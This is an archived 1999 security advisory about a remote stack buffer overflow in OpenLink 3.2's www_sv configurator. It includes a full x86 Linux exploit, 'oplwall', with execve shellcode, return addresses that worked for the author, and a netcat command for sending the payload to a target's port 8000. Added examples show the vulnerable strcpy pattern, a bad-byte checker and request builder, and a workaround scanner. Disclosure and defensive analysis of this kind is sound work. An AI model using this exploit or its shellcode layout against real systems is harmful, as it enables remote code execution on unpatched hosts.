openlink.3.2.txt

Posted Oct 18, 1999
Authored by Tymm Twillman

tags | exploit, remote, web, overflow, arbitrary
SHA-256 | b36a8272ac716effd911a885be7e5ec3e74fe7e469278cc4955a647b5a86bbe3


Overview:

A serious security hole has been found in the web configuration utility
that comes with OpenLink 3.2. This hole allows remote users to execute
arbitrary code as the user id under which the web configurator is run
(inherited from the request broker, oplrqb). The hole is a run-of-the-mill
stack buffer overflow: request data is copied with strcpy() and no length
check, so an over-long request runs past the buffer and overwrites the
saved return address.
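
The pattern behind the hole, shown as an added example (not code from
the advisory or from OpenLink): a request handler that copies the GET
target into a fixed stack buffer with strcpy(), beside a hardened version
that measures the target first and rejects anything that does not fit.
The buffer size, the request lines and the helper names are assumptions
made for illustration; the real size of the www_sv buffer is not given
in the advisory.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical buffer size; the advisory does not give www_sv's real one. */
#define TARGET_MAX 64

/* Constructed request line used for the demonstration. */
static const char short_request[] = "GET /index.html HTTP/1.0\r\n";

/* The vulnerable pattern the advisory describes: the request target is
 * copied into a fixed stack buffer with strcpy(). A target of TARGET_MAX
 * bytes or more runs past `target` into the saved frame pointer and return
 * address. Returns the target length, or -1 if the line is not a GET. */
int handle_request_unsafe(const char *line)
{
    char target[TARGET_MAX];

    if (strncmp(line, "GET ", 4) != 0)
        return -1;
    strcpy(target, line + 4);                   /* no bound: the overflow */
    target[strcspn(target, " \r\n")] = '\0';    /* drop version and line ending */
    return (int)strlen(target);
}

/* Hardened form: measure the target, refuse it if it does not fit (leaving
 * room for the terminator), then copy with an explicit length. Rejecting
 * rather than truncating keeps a half-copied target out of later processing.
 * Returns the length, -1 if not a GET, -2 if the target is too long. */
int handle_request_safe(const char *line)
{
    char target[TARGET_MAX];
    const char *p;
    size_t n;

    if (strncmp(line, "GET ", 4) != 0)
        return -1;
    p = line + 4;
    n = strcspn(p, " \r\n");                    /* target ends at whitespace */
    if (n >= sizeof target)
        return -2;
    memcpy(target, p, n);
    target[n] = '\0';
    return (int)n;
}

/* Builds "GET " + len filler bytes + "\n": the shape of the advisory's
 * request without its payload. Returns bytes written (excluding the NUL),
 * 0 if `out` is too small. */
size_t build_long_request(char *out, size_t outsz, size_t len)
{
    size_t need = 4 + len + 1;

    if (need + 1 > outsz)
        return 0;
    memcpy(out, "GET ", 4);
    memset(out + 4, 'A', len);
    out[4 + len] = '\n';
    out[5 + len] = '\0';
    return need;
}

/* Result of the hardened handler for a target of `len` filler bytes
 * (-3 if the request could not be built). */
int safe_result_for_length(size_t len)
{
    char buf[1024];

    if (build_long_request(buf, sizeof buf, len) == 0)
        return -3;
    return handle_request_safe(buf);
}

int main(void)
{
    printf("safe handler, short target: %d\n", handle_request_safe(short_request));
    printf("safe handler, 63-byte target: %d\n", safe_result_for_length(63));
    printf("safe handler, 300-byte target: %d\n", safe_result_for_length(300));
    printf("unsafe handler, short target: %d\n", handle_request_unsafe(short_request));
    /* handle_request_unsafe() with the 300-byte target is the bug itself:
     * it smashes this process's stack, so it is deliberately not run here. */
    return 0;
}
```

Both handlers agree on well-formed input; they differ only once the
target reaches the buffer size, which is exactly the input the exploit
below sends.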

Background:

OpenLink is a database request broker, providing a generic interface to
different database vendors' products. By default, a web configuration
utility (www_sv) is installed, which listens on TCP port 8000. For more
information, see OpenLink Software's web site at http://www.openlinksw.com.

Exploit:

This exploit has been coded to be benign, and is just for illustration of
the hole in the configuration utility. Furthermore, it has not been coded
for portability (no promises that it will function if compiled with
anything other than egcs-2.91.66, and the inline assembly is x86-only).
This works against the Linux/glibc version of OpenLink 3.2's
configurator. It can easily be modified for other purposes, however, and
I have reason to believe that the majority, if not all, platforms are
vulnerable to such an attack.

A stack address may be specified on the command line; this is the guessed
location of the payload on www_sv's stack, and is what the overflow writes
over the saved return address (I've had luck with 0xbffffb65, 0xbffffb85 or
0xbffffbe5). Output of this should be piped through netcat, e.g.

./oplwall 0xbffffb85 | nc machine.to.hit 8000

--- cut ---
#include <stdio.h>
#include <stdlib.h>     /* strtoul */
#include <string.h>     /* strcpy, strcat, memcpy */
#include <stdint.h>     /* uint32_t */

/*
 * Exploit for Openlink's web configurator for Linux/glibc2
 * use: pipe through netcat to openlink web port (8000 default)
 * ex: ./oplwall 0xbffffb85 | nc machine.to.hit 8000
 * makes www_sv execute /usr/bin/wall if you hit the address right
 *
 * For informational purposes only. This was written to show that
 * there's a problem, not for skr1pt k1dd33z --.
 * don't ask me for help on how to use this to crack systems,
 * help compiling or anything else. It will only compile on
 * an x86 compiler however.
 *
 * Addresses that work for me: 0xbffffb65 (initial run of the broker)
 * 0xbffffb85 (all consecutive attempts)
 * probably tied to process ID www_sv runs as;
 * first try PIDs were in triple digits, others
 * 4 digit PIDs.
 *
 * If this works, generally no more www_sv processes will be run as a side effect.
 */

/* The shellcode lives in the body of this function. It is never called;
 * its bytes are read out through the `shellcode` pointer below. Each
 * assembly line is its own string literal (the original relied on egcs
 * accepting one string literal that spans lines). */
void test(void)
{
    __asm__(
        "jmp doit\n"
        "exploit:\n"
        /* code basically from Aleph One's stack smashing article, with minor mods */
        "popl %esi\n"               /* %esi -> the string pushed by `call exploit` */
        "movb $0xd0,%al\n"          /* get a '/' (0x2f) into %al */
        "xorb $0xff,%al\n"
        "movb %al,0x1(%esi)\n"      /* drop /s into place: ..usr.bin.wall. -> ./usr/bin/wall. */
        "movb %al,0x5(%esi)\n"
        "movb %al,0x9(%esi)\n"
        "xorl %eax,%eax\n"          /* clear %eax */
        "movb %al,0xe(%esi)\n"      /* drop a 0 at end of string (the original wrote
                                       movb %eax here, which current gas rejects) */
        "movl %eax,0x13(%esi)\n"    /* drop NULL for environment */
        "leal 0x13(%esi),%edx\n"    /* point %edx to environment */
        "movl %esi,0xf(%esi)\n"     /* drop pointer to argv */
        "leal 0xf(%esi),%ecx\n"     /* point %ecx to argv */
        "movl %esi,%ebx\n"          /* point %ebx to command - 1 */
        "inc %ebx\n"                /* fix it to point to the right place */
        "movb $0xb,%al\n"           /* index to execve syscall */
        "int $0x80\n"               /* execute it */
        "xorl %ebx,%ebx\n"          /* if exec failed, exit nicely... */
        "movl %ebx,%eax\n"
        "inc %eax\n"
        "int $0x80\n"
        "doit:\n"
        "call exploit\n"
        ".string \"..usr.bin.wall.\"\n"
    );
}

/* Skip the 3-byte prologue (push %ebp; mov %esp,%ebp) egcs emits for
 * test(); a compiler that emits a different prologue needs another offset. */
char *shellcode = ((char *)test) + 3;

char code[1000];

int main(int argc, char *argv[])
{
    int i;
    char where[5] = {0};        /* 4 address bytes plus a terminator, for strcat() */
    char *dummy;
    unsigned long addr;
    uint32_t addr32;

    if (argc > 1)
        addr = strtoul(argv[1], &dummy, 0);
    else
        addr = 0xbffffb85;

    fprintf(stderr, "Setting address to %08lx\n", addr);

    /* Store the address little-endian, as the x86 stack holds it
     * (the original did *((long *)where) = addr). */
    addr32 = (uint32_t)addr;
    memcpy(where, &addr32, 4);

    /* Shellcode first, then the guessed address repeated 64 times so that
     * one copy lands on the saved return address. strcpy()/strcat() stop at
     * a NUL, so neither the shellcode nor the address may contain 0x00. */
    strcpy(code, shellcode);

    for (i = 0; i < 64; i++)
        strcat(code, where);

    printf("GET %s\n", code);

    return 0;
}

--- cut ---
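
The address oplwall repeats after the shellcode has to survive the
strcpy() in www_sv, which stops at the first 0x00 byte, and (an
assumption, not something the advisory states) should also avoid the
space and line-ending bytes a request parser is likely to split on. The
following added example, not part of the advisory, checks a candidate
address for those bytes and lays out the same "GET " + payload + address
x 64 request that oplwall prints, using a four-NOP stand-in for the
shellcode. The candidates are the three addresses the advisory lists plus
two constructed unusable ones.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Bytes that must not appear anywhere in the request: www_sv's strcpy()
 * stops at 0x00; the space and line endings are an assumption about how
 * the request target is delimited, and are excluded to be conservative. */
static const unsigned char bad_bytes[] = { 0x00, 0x0a, 0x0d, 0x20 };

static int is_bad_byte(unsigned char b)
{
    for (size_t j = 0; j < sizeof bad_bytes; j++)
        if (b == bad_bytes[j])
            return 1;
    return 0;
}

/* Returns -1 if addr can be sent intact, otherwise the value of the first
 * offending byte in memory order (little-endian, as the x86 stack holds it). */
int first_bad_byte(uint32_t addr)
{
    for (int i = 0; i < 4; i++) {
        unsigned char b = (unsigned char)(addr >> (8 * i));
        if (is_bad_byte(b))
            return b;
    }
    return -1;
}

/* Constructed stand-in for the shellcode: four NOPs. The real payload is
 * the inline assembly in oplwall above. */
static const unsigned char demo_payload[] = { 0x90, 0x90, 0x90, 0x90 };

/* Lays out the request the exploit sends: "GET " + payload + addr x repeats
 * + "\n", with addr written little-endian. Returns the number of bytes
 * written, or 0 if the payload or address contains a bad byte or the
 * buffer is too small. */
size_t build_request(unsigned char *out, size_t outsz,
                     const unsigned char *payload, size_t plen,
                     uint32_t addr, int repeats)
{
    size_t need = 4 + plen + 4 * (size_t)repeats + 1;
    size_t pos = 0;

    if (need > outsz || first_bad_byte(addr) >= 0)
        return 0;
    for (size_t k = 0; k < plen; k++)
        if (is_bad_byte(payload[k]))
            return 0;

    memcpy(out + pos, "GET ", 4);
    pos += 4;
    memcpy(out + pos, payload, plen);
    pos += plen;
    for (int r = 0; r < repeats; r++)
        for (int i = 0; i < 4; i++)
            out[pos++] = (unsigned char)(addr >> (8 * i));
    out[pos++] = '\n';
    return pos;
}

/* Builds the demo request, with oplwall's 64 repeats, into a static buffer
 * and returns its length (0 if the address is unusable). */
unsigned char demo_buf[1024];

size_t demo_request(uint32_t addr)
{
    return build_request(demo_buf, sizeof demo_buf,
                         demo_payload, sizeof demo_payload, addr, 64);
}

int main(void)
{
    /* The advisory's three addresses plus two constructed bad ones. */
    uint32_t candidates[] = { 0xbffffb65u, 0xbffffb85u, 0xbffffbe5u,
                              0xbffff000u, 0xbffffb20u };

    for (size_t i = 0; i < sizeof candidates / sizeof candidates[0]; i++) {
        int bad = first_bad_byte(candidates[i]);
        if (bad < 0)
            printf("0x%08x: usable, request is %zu bytes\n",
                   (unsigned)candidates[i], demo_request(candidates[i]));
        else
            printf("0x%08x: unusable, contains byte 0x%02x\n",
                   (unsigned)candidates[i], bad);
    }
    return 0;
}
```

With the four-byte stand-in the request is 4 + 4 + 256 + 1 = 265 bytes;
with oplwall's real shellcode the payload part is longer, and the address
bytes begin wherever that shellcode's terminating NUL would have been.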

Workaround:

Disable the www_sv application in oplrqb.ini. By default there is a
section labeled Persistent Services, with the line
"Configurator = www_sv". This section, along with the entire www_sv
section, should be commented out with semicolons, e.g.

;[Persistent Services]
;Configurator = www_sv

;[www_sv]
;Program = w3config/www_sv
;Directory = w3config
;CommandLine =
;Environment = WWW_SV

;[Environment WWW_SV]
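
A check for the workaround, as an added example that is not part of the
advisory or of OpenLink's own tooling: a small scanner over oplrqb.ini
that reports whether an uncommented "Configurator = www_sv" entry still
sits under an active [Persistent Services] section. The ini excerpts are
constructed from the lines shown above, and case-insensitive matching of
section names, keys and values is an assumption about how oplrqb reads
its ini file.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>   /* strcasecmp */

/* Constructed oplrqb.ini excerpts reproducing only the lines the advisory
 * shows: the shipped default and the commented-out workaround. */
static const char ini_default[] =
    "[Persistent Services]\n"
    "Configurator = www_sv\n"
    "\n"
    "[www_sv]\n"
    "Program = w3config/www_sv\n"
    "Directory = w3config\n"
    "CommandLine =\n"
    "Environment = WWW_SV\n"
    "\n"
    "[Environment WWW_SV]\n";

static const char ini_fixed[] =
    ";[Persistent Services]\n"
    ";Configurator = www_sv\n"
    "\n"
    ";[www_sv]\n"
    ";Program = w3config/www_sv\n"
    ";Directory = w3config\n"
    ";CommandLine =\n"
    ";Environment = WWW_SV\n"
    "\n"
    ";[Environment WWW_SV]\n";

/* Strips leading and trailing whitespace in place; returns the trimmed start. */
static char *trim(char *s)
{
    char *e;

    while (isspace((unsigned char)*s))
        s++;
    e = s + strlen(s);
    while (e > s && isspace((unsigned char)e[-1]))
        *--e = '\0';
    return s;
}

/* Returns 1 if an uncommented "Configurator = www_sv" entry is found in an
 * uncommented [Persistent Services] section, 0 otherwise. A ';' as the
 * first non-blank character comments a line out, which is the workaround
 * the advisory gives. */
int www_sv_enabled(const char *ini)
{
    char line[256];
    int in_persistent = 0;

    while (*ini) {
        const char *nl = strchr(ini, '\n');
        size_t len = nl ? (size_t)(nl - ini) : strlen(ini);
        size_t n = len < sizeof line ? len : sizeof line - 1;
        char *s, *eq;

        memcpy(line, ini, n);
        line[n] = '\0';
        ini += len + (nl ? 1 : 0);

        s = trim(line);
        if (*s == '\0' || *s == ';')
            continue;                       /* blank or commented out */
        if (*s == '[') {
            in_persistent = strcasecmp(s, "[Persistent Services]") == 0;
            continue;
        }
        if (!in_persistent || (eq = strchr(s, '=')) == NULL)
            continue;
        *eq = '\0';
        if (strcasecmp(trim(s), "Configurator") == 0 &&
            strcasecmp(trim(eq + 1), "www_sv") == 0)
            return 1;
    }
    return 0;
}

int main(void)
{
    printf("default config: www_sv %s\n",
           www_sv_enabled(ini_default) ? "ENABLED" : "disabled");
    printf("fixed config:   www_sv %s\n",
           www_sv_enabled(ini_fixed) ? "ENABLED" : "disabled");
    return 0;
}
```

Commenting out only the [www_sv] section while leaving the Persistent
Services entry in place is still reported as enabled, since the broker is
still being told to start the service.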

Discussion:

OpenLink Software has been notified of the problem and is apparently
working on a solution. I have serious concerns that the package may be
prone to other attacks, but have no confirmation of this (other than basic
DoS attacks). My suggestion is to make sure that any machine running the
OpenLink broker is well protected behind a firewall and does not allow
logins from untrusted persons.

Kudos to:

Aleph One, for his long-lived stack smashing article, and this
whole BugTraq thing.

Hobbit, of course, for netcat.

-Tymm



The NT version is vulnerable to a boundary condition as well. If memory
serves (I looked at this last April, so it may be foggy) I was able to
successfully modify the EIP but found no obvious way to get back to the
overflowing buffer (where my egg would be). When I left off I found some
code that would jump me back a little bit before the buffer.
Unfortunately, the data formed some invalid opcodes, so no luck. I'm sure
someone can figure it out; I'm sick of having my clock off by 6 hours from
SoftIce warp :)